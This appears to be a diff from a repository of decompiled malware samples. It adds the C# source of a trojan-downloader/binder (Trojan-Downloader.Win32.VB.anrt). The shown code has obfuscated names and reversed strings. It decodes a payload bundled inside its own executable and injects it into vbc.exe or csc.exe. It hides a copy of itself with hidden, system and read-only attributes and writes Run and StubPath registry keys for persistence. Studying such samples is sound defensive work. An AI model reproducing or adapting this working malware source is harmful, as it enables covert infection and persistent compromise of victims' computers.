+              Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :yromem otni elif dnuob gnitcejni rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
+            }
+          }
+          else if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
+            Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :noitcelfer gnisu elif dnuob gnitcejni rorrE"));
+        }
+        else
+        {
+          string Sykxwcxny5q4qajbe = str2 + str1;
+          if (boolean2)
+            numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
+          this.c55ygxxz3rp1vsemw5o013b42(numArray, Sykxwcxny5q4qajbe, true);
+        }
+      }
+    }
+
+    private void i4apa2zau4uyfet5mwpyrsauzpucwiech(string Rmzrohqsvjl2eukqp)
+    {
+      string[] separator1 = new string[1]
+      {
+        wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("e5lrvzg0cetvafc32duupzktp")
+      };
+      string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
+      string[] separator2 = new string[1]
+      {
+        wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ssz5rvlgcnqpykzaU")
+      };
+      string[] strArray2 = Rmzrohqsvjl2eukqp.Split(separator2, StringSplitOptions.None);
+      string[] separator3 = new string[1]
+      {
+        wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("egekjywbybggo5kvkbs0ogvif")
+      };
+      string[] strArray3 = Rmzrohqsvjl2eukqp.Split(separator3, StringSplitOptions.None);
+      string[] separator4 = new string[1]
+      {
+        wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lvbqcbgqoc0vhbpmd")
+      };
+      string[] strArray4 = Rmzrohqsvjl2eukqp.Split(separator4, StringSplitOptions.None);
+      this.H43ao0q1ckx2y3w0qhozixdn5 = strArray1[1];
+      this.vazu5g3yn2qoupbzrnflcm5ta = strArray1[2];
+      this.jfq5w2hqrukvsivotb2eaetcj = strArray1[3];
+      this.C2zbxxi4za2fdbthchmjymbz0 = Convert.ToInt32(strArray1[4]);
+      this.Zusxmm13kjq0lro02 = Convert.ToInt32(strArray1[5]);
+      this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f = Convert.ToInt32(strArray1[6]);
+      this.Mi5ejdb45agibefgw = strArray2[1];
+      this.Vwrshilkfvt1muxtiaxqao2vn = strArray2[2];
+      this.Va4nkquvaa0egawrugbp4frralrih1cl5 = strArray2[3];
+      this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb = Convert.ToInt32(strArray3[1]);
+      this.act0dsy5xkcjtyk4udzmsxpor = strArray3[2];
+      this.mehj1nkb5kab31y4pa5zzd3zh = strArray3[3];
+      this.Z2sx3vgolcrkx42a5b2bhnmdt = strArray3[4];
+      this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 = strArray3[5];
+      this.ljjgffrum0vanmiev3ujguzbfjpaluf1a = strArray3[6];
+      this.Ns5tkmgwpxzdzhfzygk50izkv = strArray3[7];
+      this.Dxpmu5z21l0jogt41vcdm0t2p = strArray3[8];
+      this.hdb50yp4mb51cxajtk2qahcip = strArray3[9];
+      this.Qmztipvjjobds0bdpgipbz14g = strArray3[10];
+      this.mqmfhbfuww2freoox = strArray3[11];
+      this.Kkrle03d2ekkcyuc2c2102hjd = this.Lzzeex3tbjpnswaet3q3lgne0(strArray3[12]);
+      this.hyrbz1kfxjvaxj0vistcunjymen3kporm = strArray3[13];
+      this.Ajiami1b52zvc3vohgymtmh5a = strArray3[14];
+      this.R3u01lftwibuhcd22 = strArray3[15];
+      this.cxhxnrorc5mp1ujxhtq1kbke4 = Convert.ToBoolean(strArray3[16]);
+      this.Fkgl04y45wljpapzd = Convert.ToBoolean(strArray3[17]);
+      this.U5rbzma1hlby3eyyhjbmc5kyd = this.rxto5yfudomwo4quiatvxlgxu(strArray3[18]) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Path.GetRandomFileName();
+      this.Zjtchyef12cwxg4onylzlprmn = strArray3[19];
+      this.Odlyq3qfbpoq3mg0so5fipxwu = strArray3[20];
+      this.U5rbzma1hlby3eyyhjbmc5kyd = this.U5rbzma1hlby3eyyhjbmc5kyd.Substring(0, this.U5rbzma1hlby3eyyhjbmc5kyd.Length - 4) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.");
+      Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
+      switch (this.Odlyq3qfbpoq3mg0so5fipxwu)
+      {
+        case "0":
+          try
+          {
+            this.Odlyq3qfbpoq3mg0so5fipxwu = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\46krowemarF\\TEN.tfosorciM\\") : Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
+            break;
+          }
+          catch (Exception ex)
+          {
+            break;
+          }
+        case "1":
+          this.Odlyq3qfbpoq3mg0so5fipxwu = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.csc\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
+          break;
+      }
+      this.cwygyk0oxmm4oly4f = Convert.ToBoolean(strArray4[1]);
+      this.Obpmsku4cgcztab1lmoobkyt5 = strArray4[2];
+      this.gkgcqdokyjuxym4wq0314usgk = strArray4[3];
+      this.nd5mirnaddlzplmuj2yyvlyhv = strArray4[4];
+      this.Jxy14wwtwogymn1qrjcja2xpw = strArray4[5];
+      this.Mebghajzp0czroix5exzsbjcb = Convert.ToBoolean(strArray4[6]);
+      this.rkkwfbuqo0azkksqy = Convert.ToBoolean(strArray4[7]);
+      this.buvpnbb4jdddrparyku5zhpzb = Convert.ToBoolean(strArray4[8]);
+      this.cgkruwksz1uyngdvorfai14estiwjwa22 = Convert.ToBoolean(strArray4[9]);
+      this.nd5mirnaddlzplmuj2yyvlyhv = this.rxto5yfudomwo4quiatvxlgxu(this.nd5mirnaddlzplmuj2yyvlyhv);
+      MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6]
+      {
+        MessageBoxButtons.OK,
+        MessageBoxButtons.OKCancel,
+        MessageBoxButtons.YesNo,
+        MessageBoxButtons.YesNoCancel,
+        MessageBoxButtons.RetryCancel,
+        MessageBoxButtons.AbortRetryIgnore
+      };
+      MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5]
+      {
+        MessageBoxIcon.Hand,
+        MessageBoxIcon.Asterisk,
+        MessageBoxIcon.Question,
+        MessageBoxIcon.Exclamation,
+        MessageBoxIcon.None
+      };
+      if (!(this.H43ao0q1ckx2y3w0qhozixdn5 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
+        return;
+      Thread.Sleep(this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f * 1000);
+      int num = (int) MessageBox.Show(this.vazu5g3yn2qoupbzrnflcm5ta, this.jfq5w2hqrukvsivotb2eaetcj, messageBoxButtonsArray[this.C2zbxxi4za2fdbthchmjymbz0], messageBoxIconArray[this.Zusxmm13kjq0lro02]);
+    }
+
+    public void fkjhdaxsce2gfuv1fe5y42qsk()
+    {
+      string executablePath = Application.ExecutablePath;
+      try
+      {
+        this.i4apa2zau4uyfet5mwpyrsauzpucwiech(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 55, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2U1TFWIUJIOH2YSDWUUDE1JLPQHUHN0TQ"))));
+        this.Tts2baf3wiatv5ghnswu3fu4o = this.n321udrptnm3xnkdwdxsh0wft(executablePath, 38, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("PQDKZJWPOV44MQSBJ"));
+        if (this.act0dsy5xkcjtyk4udzmsxpor == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+          this.Tts2baf3wiatv5ghnswu3fu4o = this.h3mz2iy1yrgiwje2h(this.Tts2baf3wiatv5ghnswu3fu4o, this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb);
+        this.Tts2baf3wiatv5ghnswu3fu4o = this.pcbc3w2jxlqgmdfs0dlf3dbkc(this.Tts2baf3wiatv5ghnswu3fu4o);
+        if (!this.cxhxnrorc5mp1ujxhtq1kbke4)
+        {
+          this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
+          this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
+          {
+            (object) this.Tts2baf3wiatv5ghnswu3fu4o,
+            (object) this.Odlyq3qfbpoq3mg0so5fipxwu,
+            (object) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("")
+          });
+        }
+        else
+          this.Eapnz3st2tmrdospqmsffns5v(this.Tts2baf3wiatv5ghnswu3fu4o);
+        if (this.Fkgl04y45wljpapzd)
+          this.c55ygxxz3rp1vsemw5o013b42(this.Tts2baf3wiatv5ghnswu3fu4o, this.U5rbzma1hlby3eyyhjbmc5kyd, true);
+        string str;
+        if (!string.IsNullOrEmpty(this.Zjtchyef12cwxg4onylzlprmn))
+        {
+          str = this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.mqmfhbfuww2freoox;
+          Directory.CreateDirectory(this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn);
+        }
+        else
+          str = this.Kkrle03d2ekkcyuc2c2102hjd + this.mqmfhbfuww2freoox;
+        if (this.mehj1nkb5kab31y4pa5zzd3zh == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+          this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.Dxpmu5z21l0jogt41vcdm0t2p, str, 1);
+        if (this.Z2sx3vgolcrkx42a5b2bhnmdt == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+          this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.hdb50yp4mb51cxajtk2qahcip, str, 2);
+        if (this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+          this.Ruzxivkrma3hdd1il(this.Ns5tkmgwpxzdzhfzygk50izkv, this.Qmztipvjjobds0bdpgipbz14g, str, 3);
+        if (this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x)
+        {
+          byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath);
+          if (!System.IO.File.Exists(str))
+            System.IO.File.WriteAllBytes(str, bytes);
+          if (System.IO.File.Exists(str))
+          {
+            if (this.hyrbz1kfxjvaxj0vistcunjymen3kporm == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+              System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
+            if (this.Ajiami1b52zvc3vohgymtmh5a == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+              System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
+            if (this.R3u01lftwibuhcd22 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
+              System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
+          }
+        }
+        this.Myk2onyuqzunnxikmdzm0nc2t(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 95, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("NDLAWVBMC2KZBPWFB5J3JGQNQ"))));
+        if (!this.cwygyk0oxmm4oly4f)
+          return;
+        this.Dsqyxep1xbkqqwuokcmpwlnunygdkudqf();
+      }
+      catch (Exception ex)
+      {
+        Console.WriteLine(ex.Message);
+      }
+    }
+
+    private void Ruzxivkrma3hdd1il(
+      string u0jp0x5zrl0q5ayh3v2w1bp40,
+      string Ef15akjyi4th4fsci,
+      string iep4bqxi0rq5itx040ytg2d2x0q13s5of,
+      int Fzyx2nfbtm3vn3bdgfaytm0sm)
+    {
+      this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x = true;
+      if (Fzyx2nfbtm3vn3bdgfaytm0sm == 1)
+        Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
+      if (Fzyx2nfbtm3vn3bdgfaytm0sm == 2)
+        Registry.LocalMachine.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
+      if (Fzyx2nfbtm3vn3bdgfaytm0sm != 3)
+        return;
+      RegistryKey subKey = Registry.LocalMachine.CreateSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci);
+      subKey.SetValue(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaPbutS"), (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
+      subKey.Close();
+      if (Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, true) == null)
+        return;
+      Registry.CurrentUser.DeleteSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, false);
+    }
+
+    private static void Main(string[] args) => new ekrod4bellvfxnmof().fkjhdaxsce2gfuv1fe5y42qsk();
+  }
+}

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/panz0mon2f5aateyhtphwozah.cs

@@ -0,0 +1,33 @@
+// Decompiled with JetBrains decompiler
+// Type: panz0mon2f5aateyhtphwozah
+// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
+
+using System;
+using System.Text;
+
+public static class panz0mon2f5aateyhtphwozah
+{
+  public static string Dsknrcn3xgwm4kutqcymeqtg4(byte[] Re2ucj3x4frepzs3c)
+  {
+    StringBuilder stringBuilder = new StringBuilder();
+    for (int index = 0; index < Re2ucj3x4frepzs3c.Length; ++index)
+    {
+      char ch = Convert.ToChar(Re2ucj3x4frepzs3c[index]);
+      stringBuilder.Append(Convert.ToString(ch));
+    }
+    return stringBuilder.ToString();
+  }
+
+  public static byte[] ydxqx4ckpkuemhnp4n2eb4laj(string Kos13k2jgfqobt5uhqj5cspab)
+  {
+    byte[] numArray = new byte[Kos13k2jgfqobt5uhqj5cspab.Length];
+    for (int startIndex = 0; startIndex < Kos13k2jgfqobt5uhqj5cspab.Length; ++startIndex)
+    {
+      char ch = Convert.ToChar(Kos13k2jgfqobt5uhqj5cspab.Substring(startIndex, 1));
+      numArray[startIndex] = Convert.ToByte(ch);
+    }
+    return numArray;
+  }
+}

MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/wisp1ff1rpzacn3jgfnasrkhmiolo44qt.cs

@@ -0,0 +1,29 @@
+// Decompiled with JetBrains decompiler
+// Type: wisp1ff1rpzacn3jgfnasrkhmiolo44qt
+// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
+
+using System;
+
+public static class wisp1ff1rpzacn3jgfnasrkhmiolo44qt
+{
+  public static int jqzvokzk5t335inc0xp55epz5 = 129;
+
+  public static byte[] br40vohypenwwv4th(byte[] Zkk3bd233f1xrgcd4m411ibwr)
+  {
+    for (int index = 0; index < Zkk3bd233f1xrgcd4m411ibwr.Length; ++index)
+    {
+      char ch = (char) ((uint) Convert.ToChar(Zkk3bd233f1xrgcd4m411ibwr[index]) ^ (uint) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.jqzvokzk5t335inc0xp55epz5);
+      Zkk3bd233f1xrgcd4m411ibwr[index] = Convert.ToByte(ch);
+    }
+    return Zkk3bd233f1xrgcd4m411ibwr;
+  }
+
+  public static string Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(string s)
+  {
+    char[] charArray = s.ToCharArray();
+    Array.Reverse((Array) charArray);
+    return new string(charArray);
+  }
+}